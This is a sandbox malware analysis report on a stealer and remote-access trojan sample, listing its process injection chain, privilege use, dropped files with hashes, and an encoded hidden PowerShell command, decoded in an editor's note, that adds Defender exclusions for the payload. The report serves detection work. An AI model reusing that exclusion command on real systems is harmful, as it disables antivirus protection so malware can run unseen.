Malware Analysis Report

2024-10-23 21:47

Sample ID 240311-s8z8gaaf85
Target c0facaa9561e361afe9d92d38e2793a0
SHA256 d8eb6d3fe02a890173827c242182acd22aa699e4bbd918fd22b95c00aa3a6445
Tags purelogstealer zgrat rat stealer upx rhadamanthys

Score 10/10


Analysis Overview

Score 10/10

SHA256 d8eb6d3fe02a890173827c242182acd22aa699e4bbd918fd22b95c00aa3a6445

Threat Level: Known bad

The file c0facaa9561e361afe9d92d38e2793a0 was found to be: Known bad.

Malicious Activity Summary

purelogstealer zgrat rat stealer upx rhadamanthys

ZGRat

PureLog Stealer payload

Rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Detect ZGRat V1

PureLog Stealer

Downloads MZ/PE file

Checks computer location settings

UPX packed file

Executes dropped EXE

Loads dropped DLL

Drops file in System32 directory

Suspicious use of SetThreadContext

Program crash

Unsigned PE

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-11 15:48

Signatures

Unsigned PE


Analysis: behavioral1

Detonation Overview

Submitted

2024-03-11 15:48

Reported

2024-03-11 15:51

Platform

win7-20240221-en

Max time kernel

132s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe"

Signatures

Detect ZGRat V1


PureLog Stealer

stealer purelogstealer

PureLog Stealer payload


ZGRat

rat zgrat

Downloads MZ/PE file

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

UPX packed file

upx

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TypeId\oubfbwcxu\AttributeString.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\TypeId\oubfbwcxu\AttributeString.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1152 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe C:\Users\Admin\AppData\Local\Temp\vctuacx.exe
PID 1152 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe
PID 2308 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe C:\Users\Admin\AppData\Local\Temp\vctuacx.exe
PID 2880 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 1148 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1612 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe

Processes

C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe

"C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe"

C:\Users\Admin\AppData\Local\Temp\vctuacx.exe

"C:\Users\Admin\AppData\Local\Temp\vctuacx.exe"

C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe

"C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe"

C:\Users\Admin\AppData\Local\Temp\vctuacx.exe

"C:\Users\Admin\AppData\Local\Temp\vctuacx.exe"

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

"C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe" 0

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

"C:\Users\Admin\AppData\Local\Temp\BBLb.exe"

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe (20 instances, no command line shown)

C:\Users\Admin\AppData\Local\Temp\BBLb.exe (2 instances, no command line shown)

C:\Windows\system32\taskeng.exe

taskeng.exe {F9F9DEE9-A1F5-4B36-B2D0-38B672C559E7} S-1-5-21-330940541-141609230-1670313778-1000:KXIPPCKF\Admin:S4U:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABBAHQAdAByAGkAYgB1AHQAZQBTAHQAcgBpAG4AZwAuAGUAeABlADsA

Decoded -enc argument (base64 of UTF-16LE text; decoded by the editor, not part of the sandbox output):
Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local; Add-MpPreference -ExclusionProcess AttributeString.exe;
That is, the script adds Microsoft Defender exclusions for the drop directory and for the AttributeString.exe payload listed below.

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

"C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe" 0

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe (2 instances, no command line shown)

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3032 -s 124

C:\Windows\system32\taskeng.exe

taskeng.exe {6A780D5A-0870-4CAE-9340-956D20C03FFB} S-1-5-21-330940541-141609230-1670313778-1000:KXIPPCKF\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\TypeId\oubfbwcxu\AttributeString.exe (4 instances, no command line shown)

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe (2 instances, no command line shown)

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABBAHQAdAByAGkAYgB1AHQAZQBTAHQAcgBpAG4AZwAuAGUAeABlADsA

Network


Files

SHA256 067522f8c4d0832c9c7495fb46638aa41e0387994284fab89e0ac6885f6a76a8
SHA512 d1822bc87a5bbbd34e2c374cd4eb384f5b965671215e6e70a6f59b07b5fcacbcfcfcd678d8894ffe818861a6694a32b9414d57d45143a5a6908431b77f4b2748

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

MD5 2738e6311dfb65c10746a7e823f9c420
SHA1 dff9f71a4ec25e8bb172629618416bc404a4cd49
SHA256 0da7fc29b321a65e7244308f99d4370a67a81c2b9407aedbee4e5a97cfde44e3
SHA512 70dbcbdecfe67d2507b09b30906a8760abdf69588287543e8251022347d98697dd051bae0c82dc2918d20f11d508e7b7273ffc68e2661d72ccb47194246d5a60

memory/1612-1980-0x0000000074430000-0x0000000074B1E000-memory.dmp

memory/1756-1985-0x00000000743B0000-0x0000000074A9E000-memory.dmp

memory/1756-1984-0x0000000000400000-0x000000000049C000-memory.dmp

memory/1756-1987-0x00000000049A0000-0x00000000049E0000-memory.dmp

memory/1756-1986-0x0000000004870000-0x0000000004958000-memory.dmp

memory/1756-3273-0x00000000743B0000-0x0000000074A9E000-memory.dmp

memory/1756-3609-0x00000000049A0000-0x00000000049E0000-memory.dmp

memory/1756-4196-0x0000000004320000-0x0000000004376000-memory.dmp

memory/1756-4198-0x0000000004450000-0x00000000044A4000-memory.dmp

memory/1756-4200-0x00000000743B0000-0x0000000074A9E000-memory.dmp

memory/2664-4205-0x0000000019E50000-0x000000001A132000-memory.dmp

memory/2664-4206-0x0000000000E70000-0x0000000000E78000-memory.dmp

memory/2664-4207-0x000007FEF5FC0000-0x000007FEF695D000-memory.dmp

memory/2664-4210-0x0000000000F50000-0x0000000000FD0000-memory.dmp

memory/2664-4211-0x000007FEF5FC0000-0x000007FEF695D000-memory.dmp

memory/2664-4212-0x0000000000F50000-0x0000000000FD0000-memory.dmp

memory/2664-4214-0x0000000000F50000-0x0000000000FD0000-memory.dmp

memory/2664-4215-0x000007FEF5FC0000-0x000007FEF695D000-memory.dmp

\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

MD5 ad7af059b52c2a4f24bffd563b27bcb3
SHA1 ce0d642c692f1c23c838c5d4232c9d2261bf5e1c
SHA256 0bc77bf0a4624a031179c2e502e650f3533e1c62cfdc3f555210317322c98d64
SHA512 75a9c7f3b87405d1d56e5c1a81dd8b20394bfb5a50af15c685f63a5651c6607f8152841453ef1403a8b26c3fd8f14de80ab20d3fb261e7655476d3d8cc56acd9

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

MD5 6a84fb8031a6073d6f4d9f3dac12f277
SHA1 19a5b6e4a107857da24779d92f446729f02825f0
SHA256 f2633b79deed5997488498e8d3ba0bc51a4eb3a3afcc05d431b15870b1d1cf0e
SHA512 b075312ad68787dfe670a7cee5323d8512f99fc3af6f3dd53f2ba9856a0f133681ed605c81da1a87bc58432c7d9db0a225342b091158c9cd0c1eeabbeb26e1e5

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

MD5 eb204f6dab7cf388aaab7888ee65d05f
SHA1 db6939b8790fa8bd6389d0677372ac1ca9cf7ce2
SHA256 751bc8e153fb220c1f91fb9fbe128cc6e5818b06468f766c75a7154acbb0f37e
SHA512 57ae37eb1bfc9ef21fbce4568957ddc22988d90d610b9dcb1d0a53e4c35a838119f1ec750cac3a943bf5e58955c223d0a244362e8cf92e9a9fb039d78170077f

memory/2092-4227-0x0000000001210000-0x0000000001438000-memory.dmp

memory/2092-4226-0x00000000743E0000-0x0000000074ACE000-memory.dmp

memory/2092-5167-0x0000000000200000-0x0000000000201000-memory.dmp

memory/2092-5166-0x0000000000D50000-0x0000000000D90000-memory.dmp

\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

MD5 c017ac6363e7d39abbecf8347cd479fd
SHA1 30cd34b1a7d5e981b6f5653cf478999aa76b7792
SHA256 0a04e77d164bf3eb3c96910b0e5b6bc6709d79fa0065a1a7dd9bbbfb414a2fb5
SHA512 35253cb41f963b6d1d5f151677d5e62bc2f34f789e56b8730b9fb90fa6384f7c850bd5127113090a863084f8a90de6c824033323fbcd52fe6dcb8734d41dc602

memory/2092-5184-0x00000000743E0000-0x0000000074ACE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

MD5 d2a7797f65d6b62f3713eddcaf73750c
SHA1 20f0368240a9f8efd5f0445a2c7f325539b2b32f
SHA256 096d84ea8e861cbf3b62f9f6761a1d0cb166fda236c296449a9a4cd67da8eab2
SHA512 70aa5e1d1aff6f0354c90e03e45d16764c444d0a4b7b4ee3e559ba782be01811030c76b85c53121002fc6c8aacfc1f9bef44e2c7b12f0cffdaff545708766e04

\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

MD5 e61fe70d671ca6e00aa25f8b815fad9d
SHA1 2b468f1cb1fb761fc97fadcf40fe20da4507f44e
SHA256 775d577ee31ec9dc960bae075095e86f4f27c843e8cf55ad7cdce1d67d554f88
SHA512 a42bf88b9ba7dcd096582d0e81d6edb724c56388074e6f4f02c72b78f5eac2e910a28f407c232d8fe84dbfd7fe6dbb99df21d7996f2fea8c7071296c8808d7f9

\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

MD5 bf61f338cc128a606e19a45341002853
SHA1 a34b4b29d7d486b846b862ff90ce8154e2cce612
SHA256 d5a856e0f918694ab607ae59f12a06bb2451a43747a38fad3cd8683b1f844a08
SHA512 76d37bdfff437211bfe9b3f85d24dab44bb8775aa50abaf40a24c279f8ade4e09e49abec4c0d0d789b2b5d576b29bd806bcf6a3c5db64b8a00f4f650c687db02

\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

MD5 7aa0db0511abc4d54de27b5ee07934dd
SHA1 04ed31bae856de6b79b2e0fb9d4cb18a5ef30d74
SHA256 a39f715893992c0370a7196ab0f78e090c27785ea83ff4fa31288edba32e0c36
SHA512 78ca8b8f41c2495b13f837696ffd5c719177db7e19ef4c8b373c6c1ba206eac847c173420add7e31ab9e73114db087ef74b3fa0029438459e22d7405ba90ec58

\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

MD5 c6afb0c004d21f8fdc5466e5b9570246
SHA1 da3585ad7f8b9b48c1b4936257881f9dd307d52a
SHA256 ebdbf9249394834c3ea133f8cbfc144a59e427f60c99317cba9ac73d58eb941d
SHA512 99e7804b085a459c9570174f8af4fc0cb71749422c111380ca0a77f195ea19fd6dd6c6901bd1a9e68b2d74e3478e63c19bfec63c0a53674d82acd946c84dbc37

\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

MD5 8185a69623e729994f4919d4559d4f25
SHA1 89645e506f85348f56b9efe2b328a2cb79080846
SHA256 c9f8af665c4d958cd778d72013e667ae8c92312776e7a1795c80ca3822ed1ab0
SHA512 ccd921fbf5f689fb56c3ad257160a7910d2484629ae9c9241097156142bec3d0bec0bca25c770a5bc2fda02c55af099e3429d2e41f2b32480f8331f2c386acee

\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

MD5 b7a65e28d323e7ccc6727daafae7fede
SHA1 524e1b10ef8b50e16413a9feb90ca3aa2196c06c
SHA256 e9a73f79b31c109d68ccd29d78589676265f9c0b1fccb18f784f43b1efa36767
SHA512 7ec76f0e181841fdfa001179e4160ad713072a787557f8d194dde9b7f8066c50069e5400d2fce6c39bb9f383396b9fe755409bb8f3640a77d106d88cf5aecd71

C:\Users\Admin\AppData\Local\TypeId\oubfbwcxu\AttributeString.exe

MD5 b0ff12175629c451084af8d40925bab0
SHA1 adbc6f27fe0094fd2f7788080e817f4cd2cebce8
SHA256 8c7089f8b1dc687eb609a76ac6bebf67b3d90168604ea624ddc8c206b19f91c0
SHA512 60efb4c9c1c0e4310252392de96dc8762d9e5529ba5e292b98aef7f207e2c4f58b67cb7819060828967a02ffdf352ee624b65e40d807ba5e4cdcfe6498430b62

C:\Users\Admin\AppData\Local\TypeId\oubfbwcxu\AttributeString.exe

MD5 926982c446e011078d140355fb07f929
SHA1 21615be164d751111bcce74a1e3029e8a830979a
SHA256 66746a1531182809a7ae7c514b5858840548a715847aca6d5bef0de05dc606d0
SHA512 32ce88d80e2a5574f2317f894c2e64128b043be80c7a9580eaf0a0bf229d6390b7ebde3dc0c64fc9a11c9ac6834aea73a50fb87dae3d59f1a0d11e22cac0ec13

memory/1204-5194-0x0000000000C90000-0x0000000000DD0000-memory.dmp

memory/1204-5195-0x0000000073A20000-0x000000007410E000-memory.dmp

memory/1204-5196-0x0000000000C20000-0x0000000000C60000-memory.dmp

memory/1204-6132-0x0000000000260000-0x0000000000261000-memory.dmp

memory/1204-6147-0x0000000073A20000-0x000000007410E000-memory.dmp

memory/612-6148-0x0000000000400000-0x000000000049C000-memory.dmp

memory/612-6149-0x0000000073A20000-0x000000007410E000-memory.dmp

memory/612-6150-0x00000000004F0000-0x0000000000530000-memory.dmp

memory/612-7097-0x0000000073A20000-0x000000007410E000-memory.dmp

memory/612-7268-0x00000000004F0000-0x0000000000530000-memory.dmp

memory/612-8359-0x0000000004DF0000-0x0000000004E44000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 a7794532b8bc992e4524df357873026e
SHA1 ce0898e1e07ac2afbbdf0728935283d780a43723
SHA256 6191e7e154da4491e85dceca26db9d2b4c9cca88180dea4c71b568a8900ed36c
SHA512 27eed2b3ee31f2762915ce6772a3e9bdc3ac552cf5296b23f21ec8752b8727824465d01dad6c6f244348632ffedb01b4825aeddf6b9e64326078e2c913bda912

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-11 15:48

Reported

2024-03-11 15:51

Platform

win10v2004-20240226-en

Max time kernel

149s

Max time network

152s

Command Line

sihost.exe

Signatures

Detect ZGRat V1


PureLog Stealer

stealer purelogstealer

PureLog Stealer payload


Rhadamanthys

stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1784 created 2660 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Windows\system32\sihost.exe
PID 1452 created 2660 N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe C:\Windows\system32\sihost.exe

ZGRat

rat zgrat

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\vctuacx.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe N/A

UPX packed file

upx

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4800 wrote to memory of 896 N/A C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe C:\Users\Admin\AppData\Local\Temp\vctuacx.exe
PID 4800 wrote to memory of 896 N/A C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe C:\Users\Admin\AppData\Local\Temp\vctuacx.exe
PID 4800 wrote to memory of 896 N/A C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe C:\Users\Admin\AppData\Local\Temp\vctuacx.exe
PID 4800 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe
PID 4800 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe
PID 4800 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe
PID 4800 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe
PID 896 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe C:\Users\Admin\AppData\Local\Temp\vctuacx.exe
PID 896 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe C:\Users\Admin\AppData\Local\Temp\vctuacx.exe
PID 896 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe C:\Users\Admin\AppData\Local\Temp\vctuacx.exe
PID 896 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe C:\Users\Admin\AppData\Local\Temp\vctuacx.exe
PID 3964 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 3964 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 3964 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1172 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 1172 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 1172 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 1172 wrote to memory of 4548 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1172 wrote to memory of 4548 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1172 wrote to memory of 4548 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1172 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1172 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1172 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1172 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1172 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
